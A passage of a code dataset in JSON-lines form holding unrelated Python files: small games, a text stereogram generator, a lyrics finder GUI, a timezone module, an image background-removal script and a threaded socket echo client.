get_miles(delivery, time):\r\n miles = 0\r\n hours = time.hour + time.minute / 60 + time.second / 3600\r\n if hours > delivery[3]:\r\n miles = min((hours - delivery[3]) * 18, delivery[1])\r\n miles = float(\"{:.2f}\".format(min((hours - delivery[3]) * 18, delivery[1])))\r\n return miles\r\n return miles\r\n \r\n del1_miles = get_miles(del1, time)\r\n del2_miles = get_miles(del2, time)\r\n del3_miles = get_miles(del3, time)\r\n total_miles = float(\"{:.2f}\".format(del1_miles + del2_miles + del3_miles))\r\n return del1_miles, del2_miles, del3_miles, total_miles\r\n \r\n ","repo_name":"maaxxxx22/Package-Routing-System-","sub_path":"rt_mileage.py","file_name":"rt_mileage.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34431097357","text":"t=int(input())\nwhile(t!=0):\n n=int(input())\n arr=list(map(int,input().split()))[:n]\n uniqueCount=0\n myMap={}\n for i in range(n):\n if(myMap.get(arr[i]) is None):\n uniqueCount+=1\n myMap[arr[i]]=1\n else:\n myMap[arr[i]]+=1\n sameCount=max(myMap.values())\n if(sameCount==uniqueCount-1):\n print(sameCount)\n else:\n print(max(min(sameCount,uniqueCount-1),min(sameCount-1,uniqueCount)))\n t-=1\n","repo_name":"raghavbiyani19/CodeForces","sub_path":"1335C.py","file_name":"1335C.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70869495205","text":"import random\nimport re\nimport string\n\nPADDING = 1\nVPADDING = 1\nDOUBLE_SPACE = False\nPATTERN_LEN = 15\nPATTERN_CHARS = string.ascii_uppercase + string.digits\n\n\nclass stereo_panel(object):\n \"\"\"This is a class for building text-based autostereograms.\n Any text passed in 'lines' surrounded by /forward slashes/ will\n pop out in the foreground. Any text passed in 'lines' surrounded\n by \\backslashes\\ will pop out in the background.\"\"\"\n def __init__(self, lines, padding_len=PADDING,\n vpadding_len=VPADDING, double_space=DOUBLE_SPACE):\n \"\"\"lines: (multiline string) Text to be used in autostereogram,\n with text in /forward slashes/ placed in the foreground, and\n text in \\backslashes\\ placed in the background\n padding_len: (int) Number of spaces to place before and after\n the longest line of text\n vpadding_len: (int) Number of blank lines to place above and\n below the block of text\"\"\"\n self.lines = []\n for line in lines.split('\\n'):\n self.lines.append(line.strip())\n self.padding_len = padding_len\n self.vpadding_len = vpadding_len\n self.double_space = double_space\n\n def get_lines(self):\n return self.lines.copy()\n\n def get_longest_line(self):\n \"\"\"returns length of longest line from self.lines, which is\n needed for calculating padding\"\"\"\n longest_line = 0\n for line in self.get_stripped_lines():\n if len(line) > longest_line:\n longest_line = len(line)\n return longest_line\n\n def get_padding_len(self):\n \"\"\"returns number of spaces to be placed before and after the\n longest line\"\"\"\n return self.padding_len\n\n def set_padding_len(self, pad_len):\n \"\"\"pad_len: (int) Number of spaces to be placed before and\n after the longest line\"\"\"\n self.padding_len = pad_len\n\n def get_vpadding_len(self):\n \"\"\"Returns number of blank lines to be placed before and after\n block of text\"\"\"\n return self.vpadding_len\n\n def set_vpadding_len(self, vpad_len):\n \"\"\"vpad_len: (int) Number of blank lines to be placed before and\n after block of text\"\"\"\n self.vpadding_len = vpad_len\n\n def get_double_space(self):\n return self.double_space\n\n def set_double_space(self, double_space):\n self.double_space = double_space\n\n def get_stripped_lines(self):\n \"\"\"Returns list of lines with forward slashes, and backslashes\n stripped\"\"\"\n stripped_lines = []\n for line in self.get_lines():\n if self.get_double_space():\n line = line.replace(' ', ' ')\n stripped_line = line.replace('/', '')\n stripped_line = stripped_line.replace('\\\\', '')\n stripped_lines.append(stripped_line)\n return stripped_lines.copy()\n\n def get_stereo_lines(self):\n \"\"\"Returns list of lines with words in forward slashes and\n backslashes offset appropriately\"\"\"\n stereo_lines = []\n regex_fg = re.compile(r' ?\\/(.*)\\/ ?')\n regex_bg = re.compile(r' ?\\\\(.*)\\\\ ?')\n for line in self.get_lines():\n if self.get_double_space():\n line = line.replace(' ', ' ')\n while re.search(regex_fg, line) is not None:\n line = re.sub(regex_fg, r'\\1 ', line)\n while re.search(regex_bg, line) is not None:\n line = re.sub(regex_bg, r' \\1', line)\n stereo_lines.append(line)\n return stereo_lines.copy()\n\n def get_padded_str(self, line_text, pad_len, longest_line):\n \"\"\"returns line with padding before and after string.\n line_text: (string) line of text to add padding to\n pad_length: (int) length of padding to be added to longest\n line\n longest_line: (int) length of longest line\"\"\"\n line_len = longest_line + (pad_len * 2)\n padding = ' ' * int((line_len - len(line_text)) / 2)\n padded_line = padding + line_text + padding\n if len(padded_line) == line_len:\n return padded_line\n else:\n return padded_line + ' '\n\n def __str__(self):\n lines = self.get_stripped_lines()\n stereos = self.get_stereo_lines()\n\n # set beginning of text block\n start_end = '*' * (self.get_longest_line() + 2 +\n (self.get_padding_len() * 2))\n ret = (start_end * 2)[:-1] + '\\n'\n\n # add vertical padding to top of text block\n for i in range(self.get_vpadding_len()):\n ret += '*' + (' ' * ((self.get_padding_len() * 2) +\n self.get_longest_line())) + '*'\n ret += (' ' * ((self.get_padding_len() * 2) +\n self.get_longest_line())) + '*\\n'\n\n # add text block panels\n for line, stereo in zip(lines, stereos):\n ret += '*' + self.get_padded_str(line,\n self.get_padding_len(),\n self.get_longest_line()) + '*'\n ret += self.get_padded_str(stereo,\n self.get_padding_len(),\n self.get_longest_line()) + '*\\n'\n\n # add vertical padding to bottom of text block\n for i in range(self.get_vpadding_len()-1):\n ret += '*' + (' ' * ((self.get_padding_len() * 2) +\n self.get_longest_line())) + '*'\n ret += (' ' * ((self.get_padding_len() * 2) +\n self.get_longest_line())) + '*\\n'\n ret += (start_end * 2)[:-1]\n return ret\n\n\nclass stereo_sirt(object):\n \"\"\"This is a class for building 'single image random text'\n autostereograms. A depth map should be passed consisting of\n equal-length lines of text made up of numbers 0 through 9. The\n output will be an autostereogram with the depth of the 3d effect\n following the depth map, with 0 being the farthest away from the\n view, and 9 being closest.\"\"\"\n\n def __init__(self, depth_map, pattern_len=PATTERN_LEN):\n \"\"\"depth_map: (multiline string of numbers 0 through 9) Depth\n map for 3d effect. All lines should be of equal length, all\n characters should be numbers, and no number should be more or\n less than 1 higher/lower than the number before it.\n pattern_len: (integer) The length of the repeating pattern\n for each line.\"\"\"\n self.depth_map = []\n lineLen = 0\n for line in depth_map.split('\\n'):\n if len(line.strip()) > 0:\n if lineLen == 0:\n lineLen = len(line.strip())\n elif len(line.strip()) is not lineLen:\n raise AssertionError('All lines in depth map must be the '\n 'same length')\n c = 0\n for i in line:\n if re.search(r'[^0-9]', line[c]) is not None:\n raise AssertionError('Depth map can only contain '\n 'numbers')\n if abs(int(line[c]) - int(line[c-1])) > 1:\n raise AssertionError('All numbers in depth map must '\n 'be no more than 1 more or less '\n 'than the numbers before and '\n 'after it')\n c += 1\n self.depth_map.append(line.strip())\n self.pattern_chars = PATTERN_CHARS\n if pattern_len <= len(self.pattern_chars) and pattern_len > 5:\n self.pattern_len = pattern_len\n else:\n raise AssertionError('Pattern length cannot be less than 5, or '\n 'greater than the number of pattern '\n 'characters')\n\n def get_pattern_len(self):\n \"\"\"Returns integer for length of pattern to generate.\"\"\"\n return self.pattern_len\n\n def set_pattern_len(self, pattern_len):\n \"\"\"Changing the pattern length may make it easier to focus on\n the final image that's generated.\n pattern_len: (integer) Length of pattern to generate\"\"\"\n if pattern_len <= len(self.pattern_chars) and pattern_len > 5:\n self.pattern_len = pattern_len\n else:\n raise AssertionError('Pattern length cannot be less than 5, or '\n 'greater than the number of pattern '\n 'characters')\n\n def set_pattern_chars(self, pattern_chars):\n \"\"\"pattern_chars: (string) characters to choose from when\n generating random pattern.\"\"\"\n if self.pattern_len <= len(pattern_chars):\n self.pattern_chars = pattern_chars\n else:\n raise AssertionError('The number of pattern characters cannot be '\n 'less than the pattern length')\n\n def get_pattern_chars(self):\n \"\"\"Returns characters to choose from when generating random\n pattern.\"\"\"\n return self.pattern_chars\n\n def get_pattern(self):\n \"\"\"Returns random pattern.\"\"\"\n pattern_len = self.get_pattern_len()\n chars = self.get_pattern_chars()\n pattern = ''\n for _ in range(pattern_len):\n random_char = random.choice(chars)\n while random_char in pattern:\n random_char = random.choice(chars)\n pattern += random_char\n return pattern\n\n def get_pattern_char(self, current_pattern):\n \"\"\"Returns random character that does not exist in the current\n pattern.\n current_pattern: (string) String containing characters that\n should not be returned by this method.\"\"\"\n chars = self.get_pattern_chars()\n random_char = random.choice(chars)\n while random_char in current_pattern:\n random_char = random.choice(chars)\n return random_char\n\n def get_depth_map(self):\n \"\"\"Returns list object with each element being a line of the\n depth map.\"\"\"\n return self.depth_map.copy()\n\n def get_depth_map_str(self):\n \"\"\"Returns multiline string containing the entire depth map.\"\"\"\n depth_map = self.get_depth_map()\n result = ''\n for line in depth_map:\n result += line + '\\n'\n return result\n\n def __str__(self):\n ret = ''\n depth_map = self.get_depth_map()\n for line in depth_map:\n pattern = self.get_pattern()\n # 'p' tracks where we are in the pattern\n # 'c' tracks where we are in the line\n # 'new_pattern' will hold changes to the pattern\n # 'new_line' will hold the current line that we're building\n p = 0\n c = 0\n new_pattern = ''\n new_line = pattern\n for _ in line[:-1]:\n if p == len(pattern):\n p = 0\n pattern = new_pattern\n new_pattern = ''\n if line[c] < line[c+1]:\n new_char = ''\n elif line[c] < line[c-1]:\n new_char = (self.get_pattern_char(pattern + new_pattern) +\n pattern[p])\n else:\n new_char = pattern[p]\n new_pattern += new_char\n new_line += new_char\n c += 1\n p += 1\n ret += new_line + '\\n'\n return ret\n","repo_name":"kf5grd/stereo_text","sub_path":"stereo_text.py","file_name":"stereo_text.py","file_ext":"py","file_size_in_byte":11739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33573256363","text":"'''\r\nTopic: Finding songs lyrics using tkinter for user interface and\r\nlyricsgenius for searching songs lyrics\r\n'''\r\n\r\nfrom tkinter import * # Importing tkinter module\r\nfrom PIL import ImageTk, Image # Import PIL for using jpeg image in background\r\nimport lyricsgenius as lg # Import lyricsgenius\r\n\r\n# Creating Tk object\r\nroot = Tk()\r\n\r\n# Setting up root width and height\r\nroot.geometry(\"600x800\")\r\n\r\n# root title\r\nroot.title(\"Lyrics Finder\")\r\n\r\n# Disenabling root resize property\r\nroot.resizable(0, 0)\r\n\r\n# Setting up background image and placing it\r\nbgImg = Image.open(\"musicbg.jpg\")\r\nbgPhoto = ImageTk.PhotoImage(bgImg)\r\nbgLbl = Label(root, image=bgPhoto)\r\nbgLbl.place(x=0, y=0, relwidth=1, relheight=1)\r\n\r\n\r\ndef back_to_main():\r\n '''\r\n This function will take user back to main_func\r\n '''\r\n\r\n # Deleting widgets of show_lyrics function\r\n del2_list = [scroll_x, scroll_y, song_textbox, back_btn]\r\n for i in del2_list:\r\n i.destroy()\r\n\r\n main_func()\r\n\r\n# Function to show lyrics\r\ndef show_lyrics():\r\n '''\r\n This function will show lyrics of the song\r\n '''\r\n\r\n global scroll_x, scroll_y, song_textbox, back_btn\r\n\r\n # Deleting widgets of main_func\r\n del_list = [main_lbl, entry_box, sub_lbl, go_btn]\r\n for i in del_list:\r\n i.destroy()\r\n\r\n # Getting song name from song_var and setting it to root title\r\n song_name = song_var.get().title()\r\n root.title(song_name)\r\n\r\n # Scroll bar for horizontal and vertical axis\r\n scroll_x = Scrollbar(root, orient=\"horizontal\")\r\n scroll_y = Scrollbar(root, orient=\"vertical\")\r\n\r\n # Packing scrollbar at required position\r\n scroll_x.pack(side=BOTTOM, fill=X)\r\n scroll_y.pack(side=RIGHT, fill=Y)\r\n\r\n # Textbox where lyrics will be showe up\r\n song_textbox = Text(root, width=69, height=40, bg=\"black\", fg=\"purple\", xscrollcommand=scroll_x.set, yscrollcommand=scroll_y.set, font=\"time 10 bold\")\r\n song_textbox.place(x=20, y=20)\r\n\r\n # Searching for song lyrics\r\n genius = lg.Genius('',\r\n skip_non_songs=True, excluded_terms=[\"(Remix)\", \"(Live)\"],\r\n remove_section_headers=True)\r\n\r\n\r\n song = genius.search_song(song_name)\r\n\r\n # Inserting lyrics in song_textbox\r\n song_textbox.insert(END, song.artist)\r\n song_textbox.insert(END, \"\\n\\n\")\r\n\r\n for i in song.lyrics:\r\n song_textbox.insert(END, i)\r\n\r\n song_textbox.insert(END, \"\\n\\n\")\r\n\r\n # Connecting scrollbar to song_textbox widget\r\n scroll_x.config(command=song_textbox.xview)\r\n scroll_y.config(command=song_textbox.yview)\r\n\r\n # Buttton to return back to main screen\r\n back_btn = Button(root, text=\"Back\", bg=\"black\", fg=\"purple\", font=\"time 15 bold\", width=10, command=back_to_main)\r\n back_btn.place(x=20, y=680)\r\n\r\n\r\ndef main_func():\r\n '''\r\n This is the main function\r\n '''\r\n\r\n global main_lbl, entry_box, sub_lbl, go_btn, song_var\r\n\r\n # Main heading\r\n main_lbl = Label(root, text=\"Lyrics Finder\", font=\"harrington 40 bold underline\", fg=\"purple\", bg=\"black\")\r\n main_lbl.place(x=150, y=170)\r\n\r\n song_var = StringVar() # Variabel for storing user input\r\n\r\n # Entry box for taking user input\r\n entry_box = Entry(root, textvar=song_var, width=50, bg=\"lightgrey\", fg=\"black\", font=\"time 15 bold\")\r\n entry_box.place(x=25, y=300, height=60)\r\n\r\n sub_lbl = Label(root, text=\"Type the name of the song in the above box...\", font=\"harrington 17 bold italic\", fg=\"purple\", bg=\"black\")\r\n sub_lbl.place(x=25, y=380)\r\n\r\n # Go button will take the user where lyrics are\r\n go_btn = Button(root, text=\"Go-->\", bg=\"black\", fg=\"purple\", font=\"time 15 bold\", width=10, command=show_lyrics)\r\n go_btn.place(x=240, y=500)\r\n\r\n\r\nmain_func() # Calling main function\r\nroot.mainloop() # Calling root.mainloop() to run our program\r\n","repo_name":"amisha128/songlyrics-finder","sub_path":"songLyricsFinder.py","file_name":"songLyricsFinder.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71714916325","text":"import turtle\nimport os\n\nwn = turtle.Screen()\nwn.title(\"Гоненица\")\nwn.bgcolor(\"#DFB9CA\")\nwn.setup(width=1200, height=400)\nwn.tracer(0)\n\n\n\n# pole\nfor kletka in range(1, 38):\n\n # kvadratche\n kvadratche = turtle.Turtle()\n kvadratche.speed(0)\n kvadratche.shape(\"square\")\n kvadratche.color(\"#F34616\")\n kvadratche.penup()\n kvadratche.goto((kletka * (20+10)) - 580, 0)\n# eof kletka\n\n#igrach\nigrach = turtle.Turtle()\nigrach.pozicia_na_igrach = 0\nigrach.speed(0)\nigrach.shape(\"circle\")\nigrach.color(\"#18730B\")\nigrach.penup()\nigrach.goto((igrach.pozicia_na_igrach * (20+10)) - 580, 0)\n\n\ntext = turtle.Turtle()\ntext.speed(0)\ntext.color(\"#F34616\")\ntext.penup()\ntext.hideturtle()\ntext.goto(0, 20)\ntext.clear()\ntext.write(\"Roll: 6\", align=\"center\", font=(\"Courier\", 24, \"bold\"))\n\n\n# Functions\ndef roll_dice():\n igrach.pozicia_na_igrach += 2\n igrach.setx((igrach.pozicia_na_igrach * (20+10)) - 580)\n\n\n# Keyboard bindings\nwn.listen()\nwn.onkeypress(roll_dice, \"r\")\nwn.onkeypress(roll_dice, \"space\")\nwn.onkeypress(roll_dice, \"Up\")\n\n# Main game loop\nwhile True:\n wn.update()\n","repo_name":"alexscorpion/gonenitsa-silata_e_v_teb","sub_path":"animated complete.py","file_name":"animated complete.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6294859614","text":"\"\"\"Importing the random module and using the randint() function\"\"\"\nimport random\nupper_limit = 10\nanswer = random.randint(1, upper_limit)\n\nprint(\"Please guess a number between 1 and {}: \".format(upper_limit))\nguess = int(input())\n\nif guess < answer:\n print('Too low. Guess again: ')\n guess = int(input())\n if guess == answer:\n print('Well done! You guessed it!')\n else:\n print('Sorry. Wrong again. \\nThe correct answer was {}'.format(answer))\nelif guess > answer:\n print('Too high. Guess again: ')\n guess = int(input())\n if guess == answer:\n print('Well done! You guessed it!')\n else:\n print('Sorry. Wrong again.\\nThe correct answer was {}'.format(answer))\nelse:\n print('You got it correct on your first try! \\nThe number was ' + str(guess) + '!')\n","repo_name":"Fitzpa/learning-python","sub_path":"02_control_flow/guessing_game_02.py","file_name":"guessing_game_02.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6092875591","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.rc('animation', html='jshtml')\nimport matplotlib.animation as animation\n\ndef test_policy(policy, env, render = False):\n\n frames = []\n\n obs = env.reset()\n done = False\n\n # number of timesteps so far\n t = 0\n\n # Logging data\n episode_len, episode_return = 0, 0 \n\n while not done:\n t += 1\n if render:\n frames.append(env.render(mode=\"rgb_array\"))\n\n # Query deterministic action from policy and run it\n action = policy(obs).detach().numpy()\n obs, reward, done, _ = env.step(action)\n\n # Sum all episodic rewards as we go along\n episode_return += reward\n \n # Track episodic length\n episode_len = t\n env.close()\n\n return episode_len, episode_return, frames\n\ndef update_scene(num, frames, patch):\n patch.set_data(frames[num])\n return patch,\n\ndef plot_animation(frames, repeat=False, interval=40):\n fig = plt.figure()\n patch = plt.imshow(frames[0])\n plt.axis('off')\n anim = animation.FuncAnimation(\n fig, update_scene, fargs=(frames, patch),\n frames=len(frames), repeat=repeat, interval=interval)\n plt.close()\n return anim","repo_name":"clam004/proximalpolicyoptimization","sub_path":"test_policy.py","file_name":"test_policy.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"16495191582","text":"\"\"\":mod:`libearth.tz` --- Basic timezone implementations\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nAlmost of this module is from the official documentation of\n:mod:`datetime` module in Python standard library.\n\n.. data:: utc\n\n (:class:`Utc`, :class:`datetime.timezone`) The :class:`~datetime.tzinfo`\n instance that represents UTC. It's an instance of :class:`Utc`\n in Python 2 (which provide no built-in fixed-offset\n :class:`~datetime.tzinfo` implementation), and an instance of\n :class:`~datetime.timezone` with zero offset in Python 3.\n\n\"\"\"\nimport datetime\n\nfrom .compat import string_type\n\n__all__ = 'FixedOffset', 'Utc', 'guess_tzinfo_by_locale', 'now', 'utc'\n\n\nclass Utc(datetime.tzinfo):\n \"\"\"UTC.\n\n In most cases, it doesn't need to be directly instantiated:\n there's already the :const:`utc` value.\n\n \"\"\"\n\n def __init__(self):\n self.zero = datetime.timedelta(0)\n\n def utcoffset(self, dt):\n return self.zero\n\n def dst(self, dt):\n return self.zero\n\n def tzname(self, dt):\n return 'UTC'\n\n def __repr__(self):\n cls = type(self)\n return '{0.__module__}.{0.__name__}()'.format(cls)\n\n\nclass FixedOffset(datetime.tzinfo):\n \"\"\"Fixed offset in minutes east from UTC.\n\n >>> kst = FixedOffset(9 * 60, name='Asia/Seoul') # KST +09:00\n >>> current = now()\n >>> current\n datetime.datetime(2013, 8, 15, 3, 18, 37, 404562, tzinfo=libearth.tz.Utc())\n >>> current.astimezone(kst)\n datetime.datetime(2013, 8, 15, 12, 18, 37, 404562,\n tzinfo=)\n\n \"\"\"\n\n def __init__(self, offset, name=None):\n self.offset = datetime.timedelta(minutes=offset)\n self.dst_ = datetime.timedelta(0)\n self.name = name or '{h:+03d}:{m:02d}'.format(h=offset // 60,\n m=offset % 60)\n\n def utcoffset(self, dt):\n return self.offset\n\n def dst(self, dt):\n return self.dst_\n\n def tzname(self, dt):\n return self.name\n\n def __repr__(self):\n cls = type(self)\n return '<{0.__module__}.{0.__name__} {1}>'.format(cls, self.name)\n\n\ntry:\n utc = datetime.timezone.utc\nexcept AttributeError:\n utc = Utc()\n\n\ndef now():\n \"\"\"Return the current :class:`~datetime.datetime` with the proper\n :class:`~datetime.tzinfo` setting.\n\n >>> now()\n datetime.datetime(2013, 8, 15, 3, 17, 11, 892272, tzinfo=libearth.tz.Utc())\n >>> now()\n datetime.datetime(2013, 8, 15, 3, 17, 17, 532483, tzinfo=libearth.tz.Utc())\n\n \"\"\"\n return datetime.datetime.utcnow().replace(tzinfo=utc)\n\n\nLANGUAGE_COUNTRY_TZINFO_TABLE = {\n 'ko': {'kr': FixedOffset(9 * 60, 'Asia/Seoul')},\n 'ja': {'jp': FixedOffset(9 * 60, 'Asia/Tokyo')}\n}\n\n\ndef guess_tzinfo_by_locale(language, country=None):\n \"\"\"Guess the most commonly used time zone from the given locale.\n\n :param language: the language code e.g. ``ko``, ``JA``\n :type language: :class:`str`\n :param country: optional country code e.g. ``kr``, ``JP``\n :type country: :class:`str`\n :return: the most commonly used time zone, or :const:`None` if can't\n guess\n :rtype: :class:`datetime.tzinfo`\n\n .. versionadded:: 0.3.0\n\n \"\"\"\n if not isinstance(language, string_type):\n raise TypeError('language must be a string, not ' + repr(language))\n elif not (country is None or isinstance(country, string_type)):\n raise TypeError('country must be a string, not ' + repr(country))\n language = language.strip().lower()\n if len(language) != 2:\n raise ValueError(repr(language) + ' is not a valid language code')\n if country:\n country = country.strip().lower()\n if len(country) != 2:\n raise ValueError(repr(country) + ' is not a valid country code')\n try:\n countries = LANGUAGE_COUNTRY_TZINFO_TABLE[language]\n except KeyError:\n return\n if country:\n return countries.get(country)\n elif len(countries) == 1:\n for tz in countries.values():\n return tz\n","repo_name":"earthreader/libearth","sub_path":"libearth/tz.py","file_name":"tz.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"52"} +{"seq_id":"42863545447","text":"#by cuining\n#2019.10.5\nfrom removebg import RemoveBg\nfrom PIL import Image\n\nwhile True:\n chose = input(\n \"\"\"\n ***************************************\n * 欢迎使用本工具 *\n * 工具是调用www.remove.bg的API实现抠图 *\n * 因此自行前往网站注册申请API密钥 *\n * 个人账户每月免费50张 *\n *=====================================*\n * 去除背景\t\t请按 1 *\n * 退出工具\t\t请按 0 *\n *************************************** \n \"\"\"\n )\n if chose == '1':\n \tapi_key = input(\"请填入你的API密钥:\\n\")\n \trmbg = RemoveBg(api_key, \"./error.log\") # 参数填入 api-key, 错误日志路径\n \timage_path0 = input(\"请输入图片地址(例如:G:/photo):\\n\")\n \timage_path1 = input(\"请输入图片名称(例如:img.png):\\n\")\n \timage_path = image_path0+'/'+image_path1\n \trmbg.remove_background_from_img_file(image_path)\n \tprint(\"抠图已完成!\")\n \tchose = input(\"\"\"\n **********************************\n * 是否需要更换常用背景颜色? *\n * 红底 请按 1 *\n * 蓝底 请按 2 *\n * 白底 请按 3 *\n * 不需要 请按 0 *\n **********************************\n \"\"\")\n \tim = Image.open(image_path0+'/'+image_path1+'_no_bg.png')\n \tx, y = im.size\n \tprint(x,y)\n \tif chose == '1':\n \t\ttry:\n \t\t\tp = Image.new('RGBA', im.size, (255, 0, 0))\n \t\t\tp.paste(im, (0, 0, x, y), im)\n \t\t\tp.save(image_path0+'/'+image_path1+'_red_bg.png')\n \t\texcept:\n \t\t\tprint('error!')\n \t\texit()\n \telif chose == '2':\n \t\ttry:\n \t\t\tp = Image.new('RGBA', im.size, (0, 0, 255))\n \t\t\tp.paste(im, (0, 0, x, y), im)\n \t\t\tp.save(image_path0+'/'+image_path1+'_blue_bg.png')\n \t\texcept:\n \t\t\tprint('error!')\n \t\texit()\n \telif chose == '3':\n \t\ttry:\n \t\t\tp = Image.new('RGBA', im.size, (255, 255, 255))\n \t\t\tp.paste(im, (0, 0, x, y), im)\n \t\t\tp.save(image_path0+'/'+image_path1+'_white_bg.png',dpi=(300.0,300.0))\n \t\texcept:\n \t\t\tprint('error!')\n \t\texit()\n \telif chose == '0':\n \t\tprint('欢迎下次使用~~~')\n \t\texit()\n\n elif chose == '0':\n print(\"欢迎下次使用~~~\")\n break\n else:\n print(\"输入有误请重新输入~~~\")","repo_name":"CuiNing6/RemoveBg","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1907940365","text":"import os\n\nuser_menu = None\nlist_number = []\n\nwhile user_menu != \"Q\":\n\n os.system(\"cls\")\n input(\"Enter para continuar...\\n\")\n os.system(\"cls\")\n\n user_menu = input(\"¿Cual opcion quieres?\\n\"\n \"A - Añadir un numero\\n\"\n \"V - Ver la lista de numeros\\n\"\n \"Q - Ver el menor y el mayor numero de la lista\\n\")\n \n os.system(\"cls\")\n input(\"Enter para continuar...\\n\")\n os.system(\"cls\")\n\n if \"A\" == user_menu:\n added_product = int(input(\"¿Que numero deseas añadir a la lista?\\n\"))\n list_number.append(added_product)\n os.system(\"cls\")\n\n elif user_menu == \"V\":\n\n os.system(\"cls\")\n print(list_number)\n input(\"Enter para Volver al menu...\\n\")\n os.system(\"cls\")\n\nsmall_number = min(list_number)\nbig_number = max(list_number)\n\nprint(\"El numero mas grande es {} y el mas pequeño es {}\".format(small_number, big_number))","repo_name":"Fakavicen/Primeros_pasos_python_Faka","sub_path":"2clasepythonmastermind/for_ej4.py","file_name":"for_ej4.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23509385412","text":"import math as math\r\nimport pylab as pl\r\nimport numpy as np\r\n\r\nG = 1\r\nA = 1.21\r\nL = 1\r\nZ = 6e+6\r\nRo = 0.122\r\nM = 0.029\r\ng = 9.81\r\nR = 8.314\r\nT = 200\r\n\r\nzr = np.pi/4 #degrees\r\nho = 2e+5 #km\r\nvo = 4e+4 #m/s\r\nmo = 1e-5 #kg\r\nRm = 3000 #kg/m3\r\n\r\nintezitet = [0]\r\nvreme = [0]\r\n\r\n#print(round(math.sin(math.radians(30)),2))Za uglove\r\n\r\ndef brzinabi(v1,t):\r\n brzina=-(G*A*m1**(-1/3)*(Rm**(-2/3))*Ra*(v1**2))\r\n return brzina\r\n\r\ndef brzinaRunge(v0,t0,dt):\r\n k1=brzinabi(v0,t0)\r\n k2=brzinabi(v0+k1/2,t0+dt/2)\r\n k3=brzinabi(v0+k2/2,t0+dt/2)\r\n k4=brzinabi(v0+k3,t0+dt)\r\n v1=v0+(k1+2*k2+2*k3+k4)/6\r\n return v1\r\n\r\ndef masabi(m1,t):\r\n masa=-(L*A*math.pow(m1,2/3)*math.pow(Rm,-2/3)*v1*v1*v1*Ra)/(2*Z)\r\n return masa\r\n\r\ndef masaRunge(m0,t0,dt):\r\n k1=masabi(m0,t0)\r\n k2=masabi(m0+k1/2,t0+dt/2)\r\n k3=masabi(m0+k2/2,t0+dt/2)\r\n k4=masabi(m0+k3,t0+dt)\r\n m1=m0+(k1+2*k2+2*k3+k4)/6\r\n return m1\r\n\r\n#def koef_sjaja(v): #tu kasnije ide v1\r\n# if (v<=16000): tau = 6.04e-4*((v/1000)-8.8)**(-0.35)\r\n# else: tau = 0.024*((v/1000)+8.8)**(-1)\r\n# return tau\r\n\r\ndef visinabi(v1):\r\n visina = ho - v1*zr*dt\r\n return visina\r\n\r\ndef ro_atmo(h1):\r\n Ra=Ro*math.exp(-(M*g*h1)/(R*T))\r\n return Ra\r\n\r\n#def magn_app(I, d):\r\n# Mapp =-14.8-2.5*math.log((683*I)/(4*np.pi*(d**2)),10)\r\n# return Mapp\r\n\r\n#def inte_zra(m, v, h):\r\n# inte = -koef_sjaja(v)*(1/2)*v**2*masabi(m,t)\r\n# return inte\r\n\r\n#def udaljenost_posma(h):\r\n# d = h/round(math.cos(math.radians(zr)),2)\r\n# return d\r\n \r\n\r\nm1 = mo\r\nv1 = vo\r\nh1 = ho\r\nt1 = 0\r\ndt = 0.1\r\nd = 282885.43\r\n#tau = 4.918e-4\r\n\r\nwhile (m1>mo/1000):\r\n print(m1,v1)\r\n #tau = koef_sjaja(v1)\r\n Ra = ro_atmo(h1)\r\n #I = inte_zra(m1, v1, h1)\r\n #intezitet.append(I)\r\n #Mapp = magn_app(I,d)\r\n v2 = brzinaRunge(v1,t1,dt)\r\n m2 = masaRunge(m1,t1,dt)\r\n h2=visinabi(v1)\r\n t1=t1+dt\r\n vreme.append(t1)\r\n #d = udaljenost_posma(h1)\r\n m1=m2\r\n v1=v2\r\n h1=h2 #Udaljenost od posmatraca\r\n\r\n#pl.plot(intezitet, vreme, 'ro')\r\npl.show()\r\n","repo_name":"ispastlibrary/Titan","sub_path":"2016/AST2/Bili/prolecni/Zadatak1.py","file_name":"Zadatak1.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5212212447","text":"# coding=utf8\n\n# std\nimport socket\nimport threading\n\ndef run(iNum = 0):\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((\"192.168.0.158\", 10241))\n\tsize = 1024 # 和服务端一致\n\tfm = \"%0\" + str(size) + \"s\"\n\ts.send(fm % iNum)\n\tcount = 0\n\twhile True:\n\t\tdata = s.recv(size)\n\t\ts.send(data)\n\t\tcount += 1\n\t\t# print \"==================>\", count\n\n\namount = 32\nlThread = []\nprint(\"new...\")\nfor i in xrange(amount):\n\tt = threading.Thread(target = run, args = [i])\n\tlThread.append(t)\n\nprint(\"start...\")\nfor t in lThread:\n\tt.start()\n\nprint(\"join...\")\nfor t in lThread:\n\tt.join()\n\nprint(\"All 